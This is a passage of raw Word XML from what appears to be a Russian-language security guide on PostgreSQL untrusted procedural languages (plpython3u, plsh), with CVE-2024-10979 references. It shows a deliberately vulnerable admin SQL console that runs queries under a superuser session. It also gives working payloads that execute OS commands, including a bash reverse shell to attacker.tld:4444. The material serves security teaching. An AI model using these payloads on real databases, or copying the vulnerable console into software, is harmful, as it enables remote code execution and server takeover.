        <w:t>•   PoC репозиторий: gh-ost00/CVE-2024-10979 — https://github.com/gh-ost00/CVE-2024-10979</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E26B78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   RedRays: «Reproducing CVE-2024-10979 — step-by-step guide» — https://redrays.io/blog/reproducing-cve-2024-10979-a-step-by-step-guide/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A418DD9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «PL/Perl — Trusted and Untrusted» — https://www.postgresql.org/docs/current/plperl-trusted.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEB7A9A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   NIST NVD: CVE-2024-10979 — https://nvd.nist.gov/vuln/detail/CVE-2024-10979</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CB2555" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R7 (sources/research.md, строки 145–160)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47642158" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.7.3 plpython3u и plsh (untrusted Python и shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6760035C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plpython3u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (untrusted PL/Python 3) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (PL/sh) — два других untrusted-расширения procedural languages для PostgreSQL, аналоги plperlu (3.7.2a) на других runtimes. Оба разрешают полный доступ к OS-API из тела функции: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plpython3u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import os</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>subprocess</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, открытые file/socket; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — само тело функции является bash-скриптом. CREATE FUNCTION в обоих требует superuser-привилегию, как и для plperlu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696DCAD1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дополнительные untrusted-языки, реже встречающиеся в production: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (PL/R, untrusted, для статистических вычислений) и trusted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plv8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (PL/JavaScript на V8, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>trusted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> по умолчанию — для большинства атак безопасен, но имеет периодические CVE через V8-engine). Эти два — одна строка в саммари, без отдельных карточек.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340AB16F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1945AC52" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/admin/sql_console.py — тот же sink, что в 3.7.2a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F073B9"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439440F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298C5B5B"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08998AED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from app.db.session import get_superuser_session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057369E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B2D1E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622A9474" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168E1FAD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.post("/admin/sql/run")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6561FB26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def run_sql(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AECCFB2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E8D945" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    session: AsyncSession = Depends(get_superuser_session),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E424C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F63B1AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(text(query))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA3E2FD"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4047ACAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Прямой sink — SQL-console под superuser-сессией. Альтернативно — SQLi через стакинг (3.5) в любой endpoint, использующий superuser-роль.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B81522" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — plpython3u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690F7A3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION pg_temp.x() RETURNS text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D15B8B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plpython3u AS $py$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B18DC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61981009" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  return subprocess.check_output(['id'], text=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AC0AD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$py$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60282D86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_temp.x();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0067449A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (то же самое):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BF7009" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION pg_temp.x() RETURNS text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F39C392" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plpython3u AS $py$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36105FA9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D329518" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  return subprocess.check_output(['id'], text=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088E7657" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$py$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5E990F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_temp.x();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3422A9CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import subprocess</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступен — sandbox отсутствует. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>check_output(['id'])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выполняет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/usr/bin/id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, возвращает stdout. Результат </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uid=999(postgres) ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> приходит в HTTP-ответ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D8A651" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Reverse-shell вариант:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0271358A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION pg_temp.rev() RETURNS void</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1FA6E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plpython3u AS $py$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7551E4F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CA1021" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  os.system("bash -c 'bash -i &gt;&amp; /dev/tcp/attacker.tld/4444 0&gt;&amp;1'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD99C94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$py$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A58A464" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT pg_temp.rev();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A78D3C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>os.system()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запускает shell, передаёт строку, форкает процесс. PostgreSQL-сессия повиснет до завершения shell-команды.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E208D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — plsh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A1C56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> использует тело функции как bash-скрипт, передавая аргументы функции как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$2</w:t>
      </w:r>
      <w:r>
        <w:t>, ... Это самый прямой untrusted-язык: ничего парсить не надо, любая строка — это bash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289DEF60" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION pg_temp.s() RETURNS text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF51170" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plsh AS $sh$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAACE2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
